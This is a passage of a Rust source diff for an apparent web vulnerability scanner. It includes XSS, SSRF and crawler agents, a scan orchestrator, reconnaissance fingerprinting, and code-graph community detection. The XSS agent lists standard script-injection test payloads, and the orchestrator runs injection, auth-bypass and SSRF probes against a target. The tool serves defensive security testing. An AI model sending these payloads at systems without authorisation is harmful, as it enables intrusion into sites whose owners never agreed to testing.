screenshot_path: None,
payload: Some(payload.to_string()),
response_time_ms: None,
};
let mut finding = DastFinding::new(
String::new(),
target_id.clone(),
DastVulnType::Ssrf,
format!(
"SSRF ({technique}) via parameter '{}'",
param.name
),
format!(
"Server-side request forgery detected in parameter '{}' at {}. \
The application made a request to an internal resource ({}).",
param.name, endpoint.url, payload
),
Severity::High,
endpoint.url.clone(),
endpoint.method.clone(),
);
finding.parameter = Some(param.name.clone());
finding.exploitable = true;
finding.evidence = vec![evidence];
finding.cwe = Some("CWE-918".to_string());
finding.remediation = Some(
"Validate and sanitize all user-supplied URLs. \
Use allowlists for permitted domains and block internal IP ranges."
.to_string(),
);
findings.push(finding);
break;
}
}
}
}
info!(findings = findings.len(), "SSRF scan complete");
Ok(findings)
}
}
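The URL-parameter heuristic can be factored into a predicate for clarity. A sketch under the assumption that the keyword list matches the agent's filter above (the `looks_like_url_param` name is illustrative):

```rust
/// True if a parameter name suggests it carries a URL the server may fetch.
fn looks_like_url_param(name: &str) -> bool {
    const KEYWORDS: [&str; 8] = [
        "url", "uri", "link", "src", "redirect", "callback", "fetch", "load",
    ];
    let lower = name.to_lowercase();
    KEYWORDS.iter().any(|k| lower.contains(k))
}

fn main() {
    assert!(looks_like_url_param("redirect_to"));
    assert!(looks_like_url_param("imageSrc"));
    assert!(!looks_like_url_param("username"));
    println!("ok");
}
```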


@@ -0,0 +1,147 @@
use compliance_core::error::CoreError;
use compliance_core::models::dast::{DastEvidence, DastFinding, DastTarget, DastVulnType};
use compliance_core::models::Severity;
use compliance_core::traits::dast_agent::{DastAgent, DastContext};
use tracing::info;
/// Cross-Site Scripting (XSS) testing agent
pub struct XssAgent {
http: reqwest::Client,
}
impl XssAgent {
pub fn new(http: reqwest::Client) -> Self {
Self { http }
}
fn payloads(&self) -> Vec<(&str, &str)> {
vec![
("<script>alert(1)</script>", "basic script injection"),
(
"<img src=x onerror=alert(1)>",
"event handler injection",
),
(
"<svg/onload=alert(1)>",
"svg event handler",
),
(
"javascript:alert(1)",
"javascript protocol",
),
(
"'\"><script>alert(1)</script>",
"attribute breakout",
),
(
"<body onload=alert(1)>",
"body event handler",
),
]
}
}
impl DastAgent for XssAgent {
fn name(&self) -> &str {
"xss"
}
async fn run(
&self,
target: &DastTarget,
context: &DastContext,
) -> Result<Vec<DastFinding>, CoreError> {
let mut findings = Vec::new();
let target_id = target
.id
.map(|oid| oid.to_hex())
.unwrap_or_else(|| "unknown".to_string());
for endpoint in &context.endpoints {
if endpoint.parameters.is_empty() {
continue;
}
for param in &endpoint.parameters {
for (payload, technique) in self.payloads() {
let test_url = if endpoint.method == "GET" {
format!(
"{}?{}={}",
endpoint.url, param.name, payload
)
} else {
endpoint.url.clone()
};
let request = if endpoint.method == "POST" {
self.http
.post(&endpoint.url)
.form(&[(param.name.as_str(), payload)])
} else {
self.http.get(&test_url)
};
let response = match request.send().await {
Ok(r) => r,
Err(_) => continue,
};
let status = response.status().as_u16();
let body = response.text().await.unwrap_or_default();
// Check if payload is reflected in response without encoding
if body.contains(payload) {
let snippet = body.chars().take(500).collect::<String>();
let evidence = DastEvidence {
request_method: endpoint.method.clone(),
request_url: test_url.clone(),
request_headers: None,
request_body: if endpoint.method == "POST" {
Some(format!("{}={}", param.name, payload))
} else {
None
},
response_status: status,
response_headers: None,
response_snippet: Some(snippet),
screenshot_path: None,
payload: Some(payload.to_string()),
response_time_ms: None,
};
let mut finding = DastFinding::new(
String::new(),
target_id.clone(),
DastVulnType::Xss,
format!("Reflected XSS ({technique}) in parameter '{}'", param.name),
format!(
"Cross-site scripting vulnerability detected in parameter '{}' at {}. \
The injected payload was reflected in the response without proper encoding.",
param.name, endpoint.url
),
Severity::High,
endpoint.url.clone(),
endpoint.method.clone(),
);
finding.parameter = Some(param.name.clone());
finding.exploitable = true;
finding.evidence = vec![evidence];
finding.cwe = Some("CWE-79".to_string());
finding.remediation = Some(
"Encode all user input before rendering in HTML context. \
Use Content-Security-Policy headers to mitigate impact."
.to_string(),
);
findings.push(finding);
break;
}
}
}
}
info!(findings = findings.len(), "XSS scan complete");
Ok(findings)
}
}
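Reflection detection hinges on the payload surviving unencoded: `body.contains(payload)` is false as soon as the server entity-encodes the angle brackets. A sketch contrasting raw and escaped reflection (the `html_escape` helper is illustrative, not part of the agent):

```rust
/// The agent flags a response only when the payload appears verbatim,
/// i.e. without HTML entity encoding.
fn is_reflected_unencoded(body: &str, payload: &str) -> bool {
    body.contains(payload)
}

/// Minimal HTML entity encoding for the characters that matter here.
fn html_escape(s: &str) -> String {
    s.replace('&', "&amp;").replace('<', "&lt;").replace('>', "&gt;")
}

fn main() {
    let payload = "<script>alert(1)</script>";
    let raw = format!("<p>You searched for {payload}</p>");
    let safe = format!("<p>You searched for {}</p>", html_escape(payload));
    assert!(is_reflected_unencoded(&raw, payload));
    assert!(!is_reflected_unencoded(&safe, payload));
    println!("ok");
}
```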


@@ -0,0 +1,200 @@
use std::collections::HashSet;
use compliance_core::error::CoreError;
use compliance_core::traits::dast_agent::{DiscoveredEndpoint, EndpointParameter};
use scraper::{Html, Selector};
use tracing::info;
use url::Url;
/// Web crawler that discovers endpoints and forms
pub struct WebCrawler {
http: reqwest::Client,
max_depth: u32,
rate_limit_ms: u64,
}
impl WebCrawler {
pub fn new(http: reqwest::Client, max_depth: u32, rate_limit_ms: u64) -> Self {
Self {
http,
max_depth,
rate_limit_ms,
}
}
/// Crawl a target starting from the base URL
pub async fn crawl(
&self,
base_url: &str,
excluded_paths: &[String],
) -> Result<Vec<DiscoveredEndpoint>, CoreError> {
let base = Url::parse(base_url)
.map_err(|e| CoreError::Dast(format!("Invalid base URL: {e}")))?;
let mut visited: HashSet<String> = HashSet::new();
let mut endpoints: Vec<DiscoveredEndpoint> = Vec::new();
let mut queue: Vec<(String, u32)> = vec![(base_url.to_string(), 0)];
while let Some((url, depth)) = queue.pop() {
if depth > self.max_depth {
continue;
}
if visited.contains(&url) {
continue;
}
// Check exclusions
if excluded_paths
.iter()
.any(|excl| url.contains(excl.as_str()))
{
continue;
}
visited.insert(url.clone());
// Rate limiting
if self.rate_limit_ms > 0 {
tokio::time::sleep(tokio::time::Duration::from_millis(self.rate_limit_ms)).await;
}
// Fetch the page
let response = match self.http.get(&url).send().await {
Ok(r) => r,
Err(_) => continue,
};
let status = response.status();
let content_type = response
.headers()
.get("content-type")
.and_then(|v| v.to_str().ok())
.unwrap_or("")
.to_string();
// Record this endpoint
endpoints.push(DiscoveredEndpoint {
url: url.clone(),
method: "GET".to_string(),
parameters: Vec::new(),
content_type: Some(content_type.clone()),
requires_auth: status.as_u16() == 401 || status.as_u16() == 403,
});
if !content_type.contains("text/html") {
continue;
}
let body = match response.text().await {
Ok(b) => b,
Err(_) => continue,
};
// Parse HTML for links and forms
let document = Html::parse_document(&body);
// Extract links
let link_selector = Selector::parse("a[href]").expect("valid selector");
for element in document.select(&link_selector) {
if let Some(href) = element.value().attr("href") {
if let Some(absolute_url) = self.resolve_url(&base, &url, href) {
if self.is_same_origin(&base, &absolute_url) && !visited.contains(&absolute_url)
{
queue.push((absolute_url, depth + 1));
}
}
}
}
// Extract forms
let form_selector = Selector::parse("form").expect("valid selector");
let input_selector =
Selector::parse("input, select, textarea").expect("valid selector");
for form in document.select(&form_selector) {
let action = form.value().attr("action").unwrap_or("");
let method = form
.value()
.attr("method")
.unwrap_or("GET")
.to_uppercase();
let form_url = self
.resolve_url(&base, &url, action)
.unwrap_or_else(|| url.clone());
let mut params = Vec::new();
for input in form.select(&input_selector) {
let name = input
.value()
.attr("name")
.unwrap_or("")
.to_string();
if name.is_empty() {
continue;
}
let input_type = input
.value()
.attr("type")
.unwrap_or("text")
.to_string();
let location = if method == "GET" {
"query".to_string()
} else {
"body".to_string()
};
params.push(EndpointParameter {
name,
location,
param_type: Some(input_type),
example_value: input.value().attr("value").map(|v| v.to_string()),
});
}
endpoints.push(DiscoveredEndpoint {
url: form_url,
method,
parameters: params,
content_type: Some("application/x-www-form-urlencoded".to_string()),
requires_auth: false,
});
}
}
info!(endpoints = endpoints.len(), "Crawling complete");
Ok(endpoints)
}
fn resolve_url(&self, _base: &Url, current_page: &str, href: &str) -> Option<String> {
// Skip anchors, javascript:, mailto:, etc.
if href.starts_with('#')
|| href.starts_with("javascript:")
|| href.starts_with("mailto:")
|| href.starts_with("tel:")
{
return None;
}
if let Ok(absolute) = Url::parse(href) {
return Some(absolute.to_string());
}
// Relative URL
let current = Url::parse(current_page).ok()?;
current.join(href).ok().map(|u| u.to_string())
}
fn is_same_origin(&self, base: &Url, url: &str) -> bool {
if let Ok(parsed) = Url::parse(url) {
parsed.host() == base.host() && parsed.scheme() == base.scheme()
} else {
false
}
}
}
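Because the frontier is a `Vec` drained with `pop()`, the crawl is depth-limited depth-first, not breadth-first. A toy model of the visited-set, exclusion, and depth bookkeeping over a static link graph (the graph itself is made up for illustration):

```rust
use std::collections::{HashMap, HashSet};

/// Depth-limited DFS over a static link graph, mirroring the crawler's
/// visited-set, exclusion, and depth checks.
fn crawl(
    links: &HashMap<&str, Vec<&str>>,
    start: &str,
    max_depth: u32,
    excluded: &[&str],
) -> Vec<String> {
    let mut visited = HashSet::new();
    let mut order = Vec::new();
    let mut stack = vec![(start.to_string(), 0u32)];
    while let Some((url, depth)) = stack.pop() {
        if depth > max_depth || visited.contains(&url) {
            continue;
        }
        if excluded.iter().any(|e| url.contains(e)) {
            continue;
        }
        visited.insert(url.clone());
        order.push(url.clone());
        for next in links.get(url.as_str()).into_iter().flatten() {
            stack.push((next.to_string(), depth + 1));
        }
    }
    order
}

fn main() {
    let mut links = HashMap::new();
    links.insert("/", vec!["/a", "/logout", "/b"]);
    links.insert("/a", vec!["/a/deep"]);
    let order = crawl(&links, "/", 1, &["/logout"]);
    assert!(order.contains(&"/b".to_string()));
    assert!(!order.contains(&"/logout".to_string())); // excluded path
    assert!(!order.contains(&"/a/deep".to_string())); // beyond max_depth
    println!("{order:?}");
}
```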


@@ -0,0 +1,6 @@
pub mod agents;
pub mod crawler;
pub mod orchestrator;
pub mod recon;
pub use orchestrator::DastOrchestrator;


@@ -0,0 +1,3 @@
pub mod state_machine;
pub use state_machine::DastOrchestrator;


@@ -0,0 +1,203 @@
use chrono::Utc;
use compliance_core::error::CoreError;
use compliance_core::models::dast::{
DastFinding, DastScanPhase, DastScanRun, DastScanStatus, DastTarget,
};
use compliance_core::traits::dast_agent::DastContext;
use tracing::{error, info};
use crate::crawler::WebCrawler;
use crate::recon::ReconAgent;
/// State machine orchestrator for DAST scanning
pub struct DastOrchestrator {
http: reqwest::Client,
rate_limit_ms: u64,
}
impl DastOrchestrator {
pub fn new(rate_limit_ms: u64) -> Self {
Self {
http: reqwest::Client::new(),
rate_limit_ms,
}
}
/// Run a complete DAST scan against a target
pub async fn run_scan(
&self,
target: &DastTarget,
sast_hints: Vec<String>,
) -> Result<(DastScanRun, Vec<DastFinding>), CoreError> {
let target_id = target
.id
.map(|oid| oid.to_hex())
.unwrap_or_else(|| "unknown".to_string());
let mut scan_run = DastScanRun::new(target_id);
let mut all_findings = Vec::new();
info!(target = %target.base_url, "Starting DAST scan");
// Phase 1: Reconnaissance
scan_run.current_phase = DastScanPhase::Reconnaissance;
let recon = ReconAgent::new(self.http.clone());
let recon_result = match recon.scan(&target.base_url).await {
Ok(r) => r,
Err(e) => {
error!(error = %e, "Reconnaissance failed");
scan_run.status = DastScanStatus::Failed;
scan_run.error_message = Some(format!("Reconnaissance failed: {e}"));
scan_run.completed_at = Some(Utc::now());
return Ok((scan_run, all_findings));
}
};
scan_run
.phases_completed
.push(DastScanPhase::Reconnaissance);
info!(
technologies = ?recon_result.technologies,
headers = recon_result.interesting_headers.len(),
"Reconnaissance complete"
);
// Phase 2: Crawling
scan_run.current_phase = DastScanPhase::Crawling;
let crawler = WebCrawler::new(
self.http.clone(),
target.max_crawl_depth,
self.rate_limit_ms,
);
let endpoints = match crawler
.crawl(&target.base_url, &target.excluded_paths)
.await
{
Ok(e) => e,
Err(e) => {
error!(error = %e, "Crawling failed");
scan_run.status = DastScanStatus::Failed;
scan_run.error_message = Some(format!("Crawling failed: {e}"));
scan_run.completed_at = Some(Utc::now());
return Ok((scan_run, all_findings));
}
};
scan_run.endpoints_discovered = endpoints.len() as u32;
scan_run.phases_completed.push(DastScanPhase::Crawling);
info!(endpoints = endpoints.len(), "Crawling complete");
// Build context for vulnerability agents
let context = DastContext {
endpoints,
technologies: recon_result.technologies,
sast_hints,
};
// Phase 3: Vulnerability Analysis
scan_run.current_phase = DastScanPhase::VulnerabilityAnalysis;
let vuln_findings = self.run_vulnerability_agents(target, &context).await?;
all_findings.extend(vuln_findings);
scan_run
.phases_completed
.push(DastScanPhase::VulnerabilityAnalysis);
// Phase 4: Exploitation (verify findings)
scan_run.current_phase = DastScanPhase::Exploitation;
// Exploitation is handled within each agent's evidence collection
scan_run.phases_completed.push(DastScanPhase::Exploitation);
// Phase 5: Reporting
scan_run.current_phase = DastScanPhase::Reporting;
scan_run.findings_count = all_findings.len() as u32;
scan_run.exploitable_count = all_findings.iter().filter(|f| f.exploitable).count() as u32;
scan_run.phases_completed.push(DastScanPhase::Reporting);
scan_run.status = DastScanStatus::Completed;
scan_run.current_phase = DastScanPhase::Completed;
scan_run.completed_at = Some(Utc::now());
info!(
findings = scan_run.findings_count,
exploitable = scan_run.exploitable_count,
"DAST scan complete"
);
Ok((scan_run, all_findings))
}
/// Run all vulnerability testing agents in parallel
async fn run_vulnerability_agents(
&self,
target: &DastTarget,
context: &DastContext,
) -> Result<Vec<DastFinding>, CoreError> {
use compliance_core::traits::DastAgent;
let http = self.http.clone();
// Spawn each agent as a separate tokio task
let t1 = target.clone();
let c1 = context.clone();
let h1 = http.clone();
let sqli_handle = tokio::spawn(async move {
crate::agents::injection::SqlInjectionAgent::new(h1)
.run(&t1, &c1)
.await
});
let t2 = target.clone();
let c2 = context.clone();
let h2 = http.clone();
let xss_handle = tokio::spawn(async move {
crate::agents::xss::XssAgent::new(h2)
.run(&t2, &c2)
.await
});
let t3 = target.clone();
let c3 = context.clone();
let h3 = http.clone();
let auth_handle = tokio::spawn(async move {
crate::agents::auth_bypass::AuthBypassAgent::new(h3)
.run(&t3, &c3)
.await
});
let t4 = target.clone();
let c4 = context.clone();
let h4 = http.clone();
let ssrf_handle = tokio::spawn(async move {
crate::agents::ssrf::SsrfAgent::new(h4)
.run(&t4, &c4)
.await
});
let t5 = target.clone();
let c5 = context.clone();
let h5 = http;
let api_handle = tokio::spawn(async move {
crate::agents::api_fuzzer::ApiFuzzerAgent::new(h5)
.run(&t5, &c5)
.await
});
let handles: Vec<tokio::task::JoinHandle<Result<Vec<DastFinding>, CoreError>>> =
vec![sqli_handle, xss_handle, auth_handle, ssrf_handle, api_handle];
let mut all_findings = Vec::new();
for handle in handles {
match handle.await {
Ok(Ok(findings)) => all_findings.extend(findings),
Ok(Err(e)) => {
error!(error = %e, "Agent failed");
}
Err(e) => {
error!(error = %e, "Agent task panicked");
}
}
}
Ok(all_findings)
}
}
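The happy-path phase progression in `run_scan` is a linear state machine; a sketch of the transitions, with a local `Phase` enum standing in for `DastScanPhase` (failure transitions, which the orchestrator models via `DastScanStatus::Failed`, are collapsed into `None` here):

```rust
#[derive(Debug, Clone, Copy, PartialEq)]
enum Phase {
    Reconnaissance,
    Crawling,
    VulnerabilityAnalysis,
    Exploitation,
    Reporting,
    Completed,
}

/// Next phase on success; `None` once the scan is complete.
fn next_phase(p: Phase) -> Option<Phase> {
    use Phase::*;
    match p {
        Reconnaissance => Some(Crawling),
        Crawling => Some(VulnerabilityAnalysis),
        VulnerabilityAnalysis => Some(Exploitation),
        Exploitation => Some(Reporting),
        Reporting => Some(Completed),
        Completed => None,
    }
}

fn main() {
    let mut p = Phase::Reconnaissance;
    let mut seen = vec![p];
    while let Some(n) = next_phase(p) {
        p = n;
        seen.push(p);
    }
    assert_eq!(seen.len(), 6);
    assert_eq!(p, Phase::Completed);
    println!("ok");
}
```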


@@ -0,0 +1,132 @@
use std::collections::HashMap;
use compliance_core::error::CoreError;
use tracing::info;
/// Result of reconnaissance scanning
#[derive(Debug, Clone)]
pub struct ReconResult {
pub technologies: Vec<String>,
pub interesting_headers: HashMap<String, String>,
pub server: Option<String>,
pub open_ports: Vec<u16>,
}
/// Agent that performs reconnaissance on a target
pub struct ReconAgent {
http: reqwest::Client,
}
impl ReconAgent {
pub fn new(http: reqwest::Client) -> Self {
Self { http }
}
/// Perform reconnaissance on a target URL
pub async fn scan(&self, base_url: &str) -> Result<ReconResult, CoreError> {
let mut result = ReconResult {
technologies: Vec::new(),
interesting_headers: HashMap::new(),
server: None,
open_ports: Vec::new(),
};
// HTTP header fingerprinting
let response = self
.http
.get(base_url)
.send()
.await
.map_err(|e| CoreError::Dast(format!("Failed to connect to target: {e}")))?;
let headers = response.headers();
// Extract server info
if let Some(server) = headers.get("server") {
let server_str = server.to_str().unwrap_or("unknown").to_string();
result.server = Some(server_str.clone());
result.technologies.push(server_str);
}
// Detect technologies from headers
let security_headers = [
"x-powered-by",
"x-aspnet-version",
"x-frame-options",
"x-xss-protection",
"x-content-type-options",
"strict-transport-security",
"content-security-policy",
"x-generator",
];
for header_name in &security_headers {
if let Some(value) = headers.get(*header_name) {
let value_str = value.to_str().unwrap_or("").to_string();
result
.interesting_headers
.insert(header_name.to_string(), value_str.clone());
if *header_name == "x-powered-by" || *header_name == "x-generator" {
result.technologies.push(value_str);
}
}
}
// Check for missing security headers
let missing_security = [
"strict-transport-security",
"x-content-type-options",
"x-frame-options",
];
for header in &missing_security {
if !headers.contains_key(*header) {
result.interesting_headers.insert(
format!("missing:{header}"),
"Not present".to_string(),
);
}
}
// Detect technology from response body
let body = response
.text()
.await
.map_err(|e| CoreError::Dast(format!("Failed to read response: {e}")))?;
self.detect_technologies_from_body(&body, &mut result);
info!(
url = base_url,
technologies = ?result.technologies,
"Reconnaissance complete"
);
Ok(result)
}
fn detect_technologies_from_body(&self, body: &str, result: &mut ReconResult) {
let patterns = [
("React", r#"react"#),
("Angular", r#"ng-version"#),
("Vue.js", r#"vue"#),
("jQuery", r#"jquery"#),
("WordPress", r#"wp-content"#),
("Django", r#"csrfmiddlewaretoken"#),
("Rails", r#"csrf-token"#),
("Laravel", r#"laravel"#),
("Express", r#"express"#),
("Next.js", r#"__NEXT_DATA__"#),
("Nuxt.js", r#"__NUXT__"#),
];
let body_lower = body.to_lowercase();
        for (tech, pattern) in &patterns {
            if body_lower.contains(&pattern.to_lowercase())
                && !result.technologies.contains(&tech.to_string())
            {
                result.technologies.push(tech.to_string());
            }
        }
}
}
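The body fingerprinting reduces to case-insensitive substring matching with deduplication, which can be isolated as a small testable function (the pattern table below is an illustrative subset, pre-lowercased):

```rust
use std::collections::HashSet;

// Substring fingerprints, mirroring detect_technologies_from_body:
// case-insensitive match against a pattern table, deduplicated.
fn detect_technologies(body: &str) -> Vec<String> {
    let patterns = [
        ("React", "react"),
        ("WordPress", "wp-content"),
        ("Next.js", "__next_data__"),
    ];
    let body_lower = body.to_lowercase();
    let mut seen = HashSet::new();
    let mut techs = Vec::new();
    for (tech, pattern) in &patterns {
        // insert returns false on duplicates, so each tech appears once
        if body_lower.contains(*pattern) && seen.insert(*tech) {
            techs.push(tech.to_string());
        }
    }
    techs
}
```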

View File

@@ -0,0 +1,37 @@
[package]
name = "compliance-graph"
version = "0.1.0"
edition = "2021"
[lints]
workspace = true
[dependencies]
compliance-core = { workspace = true, features = ["mongodb"] }
serde = { workspace = true }
serde_json = { workspace = true }
chrono = { workspace = true }
thiserror = { workspace = true }
tracing = { workspace = true }
uuid = { workspace = true }
tokio = { workspace = true }
mongodb = { workspace = true }
# Tree-sitter parsing
tree-sitter = "0.24"
tree-sitter-rust = "0.23"
tree-sitter-python = "0.23"
tree-sitter-javascript = "0.23"
tree-sitter-typescript = "0.23"
# Graph algorithms
petgraph = "0.7"
# Text search
tantivy = "0.22"
# Serialization
bson = "2"
# Async streams
futures-util = "0.3"

View File

@@ -0,0 +1,256 @@
use std::collections::HashMap;
use petgraph::graph::NodeIndex;
use petgraph::visit::EdgeRef;
use tracing::info;
use super::engine::CodeGraph;
/// Run Louvain community detection on the code graph.
/// Returns the number of communities detected. The assignments are
/// computed into a local map and are not written back to the nodes;
/// use `apply_communities` when the assignments need to be persisted.
pub fn detect_communities(code_graph: &CodeGraph) -> u32 {
let graph = &code_graph.graph;
let node_count = graph.node_count();
if node_count == 0 {
return 0;
}
// Initialize: each node in its own community
let mut community: HashMap<NodeIndex, u32> = HashMap::new();
for idx in graph.node_indices() {
community.insert(idx, idx.index() as u32);
}
// Compute total edge weight (all edges weight 1.0)
let total_edges = graph.edge_count() as f64;
if total_edges == 0.0 {
// All nodes are isolated, each is its own community
return node_count as u32;
}
let m2 = 2.0 * total_edges;
    // Pre-compute node degrees (incoming + outgoing, since edges are
    // treated as undirected when counting community links below)
    let mut degree: HashMap<NodeIndex, f64> = HashMap::new();
    for idx in graph.node_indices() {
        let d = (graph.edges(idx).count()
            + graph
                .edges_directed(idx, petgraph::Direction::Incoming)
                .count()) as f64;
        degree.insert(idx, d);
    }
// Louvain phase 1: local moves
let mut improved = true;
let mut iterations = 0;
let max_iterations = 50;
while improved && iterations < max_iterations {
improved = false;
iterations += 1;
for node in graph.node_indices() {
let current_comm = community[&node];
let node_deg = degree[&node];
// Compute edges to each neighboring community
let mut comm_edges: HashMap<u32, f64> = HashMap::new();
for edge in graph.edges(node) {
let neighbor = edge.target();
let neighbor_comm = community[&neighbor];
*comm_edges.entry(neighbor_comm).or_insert(0.0) += 1.0;
}
// Also check incoming edges (undirected treatment)
for edge in graph.edges_directed(node, petgraph::Direction::Incoming) {
let neighbor = edge.source();
let neighbor_comm = community[&neighbor];
*comm_edges.entry(neighbor_comm).or_insert(0.0) += 1.0;
}
// Compute community totals (sum of degrees in each community)
let mut comm_totals: HashMap<u32, f64> = HashMap::new();
for (n, &c) in &community {
*comm_totals.entry(c).or_insert(0.0) += degree[n];
}
// Find best community
let current_total = comm_totals.get(&current_comm).copied().unwrap_or(0.0);
let edges_to_current = comm_edges.get(&current_comm).copied().unwrap_or(0.0);
// Modularity gain from removing node from current community
let remove_cost = edges_to_current - (current_total - node_deg) * node_deg / m2;
let mut best_comm = current_comm;
let mut best_gain = 0.0;
for (&candidate_comm, &edges_to_candidate) in &comm_edges {
if candidate_comm == current_comm {
continue;
}
let candidate_total = comm_totals.get(&candidate_comm).copied().unwrap_or(0.0);
// Modularity gain from adding node to candidate community
let add_gain = edges_to_candidate - candidate_total * node_deg / m2;
let gain = add_gain - remove_cost;
if gain > best_gain {
best_gain = gain;
best_comm = candidate_comm;
}
}
if best_comm != current_comm {
community.insert(node, best_comm);
improved = true;
}
}
}
// Renumber communities to be contiguous
let mut comm_remap: HashMap<u32, u32> = HashMap::new();
let mut next_id: u32 = 0;
for &c in community.values() {
if !comm_remap.contains_key(&c) {
comm_remap.insert(c, next_id);
next_id += 1;
}
}
// Apply to community map
for c in community.values_mut() {
if let Some(&new_id) = comm_remap.get(c) {
*c = new_id;
}
}
let num_communities = next_id;
info!(
communities = num_communities,
iterations, "Community detection complete"
);
// NOTE: community IDs are stored in the HashMap but need to be applied
// back to the CodeGraph nodes by the caller (engine) if needed for persistence.
// For now we return the count; the full assignment is available via the map.
num_communities
}
/// Apply community assignments back to code nodes
pub fn apply_communities(code_graph: &mut CodeGraph) -> u32 {
let count = detect_communities_with_assignment(code_graph);
count
}
/// Detect communities and write assignments into the nodes
fn detect_communities_with_assignment(code_graph: &mut CodeGraph) -> u32 {
let graph = &code_graph.graph;
let node_count = graph.node_count();
if node_count == 0 {
return 0;
}
let mut community: HashMap<NodeIndex, u32> = HashMap::new();
for idx in graph.node_indices() {
community.insert(idx, idx.index() as u32);
}
let total_edges = graph.edge_count() as f64;
if total_edges == 0.0 {
for node in &mut code_graph.nodes {
if let Some(gi) = node.graph_index {
node.community_id = Some(gi);
}
}
return node_count as u32;
}
let m2 = 2.0 * total_edges;
let mut degree: HashMap<NodeIndex, f64> = HashMap::new();
for idx in graph.node_indices() {
let d = (graph.edges(idx).count()
+ graph
.edges_directed(idx, petgraph::Direction::Incoming)
.count()) as f64;
degree.insert(idx, d);
}
let mut improved = true;
let mut iterations = 0;
let max_iterations = 50;
while improved && iterations < max_iterations {
improved = false;
iterations += 1;
for node in graph.node_indices() {
let current_comm = community[&node];
let node_deg = degree[&node];
let mut comm_edges: HashMap<u32, f64> = HashMap::new();
for edge in graph.edges(node) {
let neighbor_comm = community[&edge.target()];
*comm_edges.entry(neighbor_comm).or_insert(0.0) += 1.0;
}
for edge in graph.edges_directed(node, petgraph::Direction::Incoming) {
let neighbor_comm = community[&edge.source()];
*comm_edges.entry(neighbor_comm).or_insert(0.0) += 1.0;
}
let mut comm_totals: HashMap<u32, f64> = HashMap::new();
for (n, &c) in &community {
*comm_totals.entry(c).or_insert(0.0) += degree[n];
}
let current_total = comm_totals.get(&current_comm).copied().unwrap_or(0.0);
let edges_to_current = comm_edges.get(&current_comm).copied().unwrap_or(0.0);
let remove_cost = edges_to_current - (current_total - node_deg) * node_deg / m2;
let mut best_comm = current_comm;
let mut best_gain = 0.0;
for (&candidate_comm, &edges_to_candidate) in &comm_edges {
if candidate_comm == current_comm {
continue;
}
let candidate_total = comm_totals.get(&candidate_comm).copied().unwrap_or(0.0);
let add_gain = edges_to_candidate - candidate_total * node_deg / m2;
let gain = add_gain - remove_cost;
if gain > best_gain {
best_gain = gain;
best_comm = candidate_comm;
}
}
if best_comm != current_comm {
community.insert(node, best_comm);
improved = true;
}
}
}
// Renumber
let mut comm_remap: HashMap<u32, u32> = HashMap::new();
let mut next_id: u32 = 0;
for &c in community.values() {
if !comm_remap.contains_key(&c) {
comm_remap.insert(c, next_id);
next_id += 1;
}
}
// Apply to nodes
for node in &mut code_graph.nodes {
if let Some(gi) = node.graph_index {
let idx = NodeIndex::new(gi as usize);
if let Some(&comm) = community.get(&idx) {
let remapped = comm_remap.get(&comm).copied().unwrap_or(comm);
node.community_id = Some(remapped);
}
}
}
next_id
}
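The local-move criterion above compares two modularity terms: the cost of detaching the node from its current community and the gain of attaching it to a candidate. That expression can be factored out and checked on paper (all edge weights 1, `total_edges` = m, matching the formulas in the loop):

```rust
// Modularity gain for moving a node between communities, matching the
// remove_cost / add_gain expressions in the Louvain local-move phase.
fn move_gain(
    edges_to_current: f64,
    edges_to_candidate: f64,
    current_total: f64,   // sum of degrees in current community (incl. node)
    candidate_total: f64, // sum of degrees in candidate community
    node_degree: f64,
    total_edges: f64,
) -> f64 {
    let m2 = 2.0 * total_edges;
    // Cost of removing the node from its current community
    let remove_cost = edges_to_current - (current_total - node_degree) * node_degree / m2;
    // Gain of adding the node to the candidate community
    let add_gain = edges_to_candidate - candidate_total * node_degree / m2;
    add_gain - remove_cost
}
```

A node that sits alone (no edges into its own community) always gains by joining a community it has edges to, which is what drives the first iteration of merges.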

View File

@@ -0,0 +1,165 @@
use std::collections::HashMap;
use std::path::Path;
use chrono::Utc;
use compliance_core::error::CoreError;
use compliance_core::models::graph::{
CodeEdge, CodeEdgeKind, CodeNode, GraphBuildRun, GraphBuildStatus,
};
use compliance_core::traits::graph_builder::ParseOutput;
use petgraph::graph::{DiGraph, NodeIndex};
use tracing::info;
use crate::parsers::registry::ParserRegistry;
use super::community::detect_communities;
use super::impact::ImpactAnalyzer;
/// The main graph engine that builds and manages code knowledge graphs
pub struct GraphEngine {
parser_registry: ParserRegistry,
max_nodes: u32,
}
/// In-memory representation of a built code graph
pub struct CodeGraph {
pub graph: DiGraph<String, CodeEdgeKind>,
pub node_map: HashMap<String, NodeIndex>,
pub nodes: Vec<CodeNode>,
pub edges: Vec<CodeEdge>,
}
impl GraphEngine {
pub fn new(max_nodes: u32) -> Self {
Self {
parser_registry: ParserRegistry::new(),
max_nodes,
}
}
/// Build a code graph from a repository directory
pub fn build_graph(
&self,
repo_path: &Path,
repo_id: &str,
graph_build_id: &str,
) -> Result<(CodeGraph, GraphBuildRun), CoreError> {
let mut build_run = GraphBuildRun::new(repo_id.to_string());
info!(repo_id, path = %repo_path.display(), "Starting graph build");
// Phase 1: Parse all files
let parse_output = self.parser_registry.parse_directory(
repo_path,
repo_id,
graph_build_id,
self.max_nodes,
)?;
        // Phase 2: Build petgraph
        let mut code_graph = self.build_petgraph(parse_output)?;
        // Phase 3: Run community detection and write assignments onto the nodes
        let community_count = super::community::apply_communities(&mut code_graph);
// Collect language stats
let mut languages: Vec<String> = code_graph
.nodes
.iter()
.map(|n| n.language.clone())
.collect::<std::collections::HashSet<_>>()
.into_iter()
.collect();
languages.sort();
build_run.node_count = code_graph.nodes.len() as u32;
build_run.edge_count = code_graph.edges.len() as u32;
build_run.community_count = community_count;
build_run.languages_parsed = languages;
build_run.status = GraphBuildStatus::Completed;
build_run.completed_at = Some(Utc::now());
info!(
nodes = build_run.node_count,
edges = build_run.edge_count,
communities = build_run.community_count,
"Graph build complete"
);
Ok((code_graph, build_run))
}
/// Build petgraph from parsed output, resolving edges to node indices
fn build_petgraph(&self, parse_output: ParseOutput) -> Result<CodeGraph, CoreError> {
let mut graph = DiGraph::new();
let mut node_map: HashMap<String, NodeIndex> = HashMap::new();
let mut nodes = parse_output.nodes;
// Add all nodes to the graph
for node in &mut nodes {
let idx = graph.add_node(node.qualified_name.clone());
node.graph_index = Some(idx.index() as u32);
node_map.insert(node.qualified_name.clone(), idx);
}
// Resolve and add edges
let mut resolved_edges = Vec::new();
for edge in parse_output.edges {
let source_idx = node_map.get(&edge.source);
let target_idx = self.resolve_edge_target(&edge.target, &node_map);
if let (Some(&src), Some(tgt)) = (source_idx, target_idx) {
